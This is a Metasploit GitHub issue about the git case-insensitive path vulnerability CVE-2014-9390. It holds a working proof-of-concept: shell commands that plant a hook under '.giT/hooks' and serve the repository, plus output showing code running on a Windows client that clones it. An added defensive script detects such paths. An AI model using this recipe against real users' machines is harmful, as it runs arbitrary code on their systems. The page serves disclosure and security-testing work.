Add coverage for git case-insensitive vulnerability (CVE-2014-9390) #4435

Closed
jhart-r7 opened this Issue Dec 19, 2014 · 1 comment

jhart-r7 commented Dec 19, 2014

cd /tmp
REPO=`mktemp -d`
git init $REPO
cd $REPO
mkdir -p .giT/hooks
echo -ne "#\!/bin/sh\r\nid > /tmp/id" > .giT/hooks/post-checkout
chmod 755 .giT/hooks/post-checkout
git add .
git commit -m "test" -a
git update-server-info
ruby -run -e httpd -- -p 8080  $REPO/.git

Then clone http://yourhost:8080:

Administrator@win7-git ~
$ rm -f /tmp/id && rm -Rf bad && /cygdrive/c/Program\ Files\ \(x86\)/Git/bin/git clone http://localhost:8080/ bad && cat /tmp/id
Cloning into 'bad'...
uid=500(Administrator) gid=544(Administrators) groups=544(Administrators)
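A defensive check for the condition reproduced above, added here as an example (it is not part of the original issue or of the Metasploit module): it flags tree paths with a component that a case-insensitive filesystem would resolve to the repository's own `.git` directory. The function names `flag_dotgit_paths`, `scan_ref` and `sample_paths` and the sample paths are constructed for illustration; `scan_ref` assumes the repository was fetched with `git clone --no-checkout` (or `--bare`) so that nothing has been written to a working tree yet.

```shell
#!/bin/sh
# Added example: detect paths that collide with .git on a case-insensitive
# filesystem (the ".giT/hooks/post-checkout" pattern shown in this issue).

# Read one path per line on stdin and print every path that has a component
# equal to ".git" once case is ignored (.giT, .GIT, .Git, ...).
# Components that merely start with ".git" (.github, .gitignore) are not flagged.
flag_dotgit_paths() {
    awk -F/ '{
        for (i = 1; i <= NF; i++)
            if (tolower($i) == ".git") { print; next }
    }'
}

# List every path recorded in a commit's tree and scan it without checking
# anything out. $1 = repository directory, $2 = ref (defaults to HEAD).
# Limitation: paths containing newlines are not handled by this line-based scan.
scan_ref() {
    git -C "$1" -c core.quotePath=false ls-tree -r --name-only "${2:-HEAD}" |
        flag_dotgit_paths
}

# Constructed sample input standing in for `git ls-tree -r --name-only` output.
sample_paths() {
    printf '%s\n' \
        'README.md' \
        '.giT/hooks/post-checkout' \
        'src/.github/ci.yml' \
        'docs/git/notes.txt' \
        'vendor/lib/.GIT/config'
}

# Demonstration on the constructed sample: prints the two colliding paths.
sample_paths | flag_dotgit_paths
```

Against a real repository, run `scan_ref /path/to/clone` before any checkout; any output means the tree should not be checked out on a case-insensitive filesystem with an unpatched client.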

jhart-r7 added a commit to jhart-r7/metasploit-framework that referenced this issue Dec 19, 2014

todb-r7 commented Dec 21, 2014

@todb-r7 todb-r7 changed the title from Add coverage for git CVE-2014-9390 to Add coverage for git case-insensitive vulnerability (CVE-2014-9390) Dec 22, 2014

@todb-r7 todb-r7 closed this in #4440 Jan 1, 2015

todb-r7 added a commit that referenced this issue Jan 1, 2015

Land #4440, git client exploit from @jhart-r7
Also fixes #4435 and makes progress against #4445.